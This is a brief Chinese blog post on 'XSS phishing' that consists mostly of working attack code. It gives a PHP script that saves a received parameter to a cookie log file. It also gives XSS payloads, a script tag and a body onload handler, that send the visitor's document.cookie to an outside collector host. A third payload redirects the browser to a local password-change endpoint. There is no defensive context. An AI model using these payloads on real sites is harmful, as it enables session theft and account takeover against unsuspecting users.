xss钓鱼篇

网站接受代码

    <?php
    $content = $_GET['a'];
    if(isset($content))
    {
    	file_put_contents('tmp/cookie.txt',$content);
    }else{
    	echo 'no date input';
    }
    ?>

构造钓鱼代码

    <script>document.location.href='http://lone.535yx.cn/xs/getcookie.php?a='+document.cookie</script>

    <body onload = "document.location.href='http://lone.535yx.cn/xs/getcookie.php?a='+document.cookie"></body>

    <script>window.location.href='http://127.0.0.1/api/change.php?p=123';</script>
posted @   LinkPoc  阅读(99)  评论(0编辑  收藏  举报
点击右上角即可分享
微信分享提示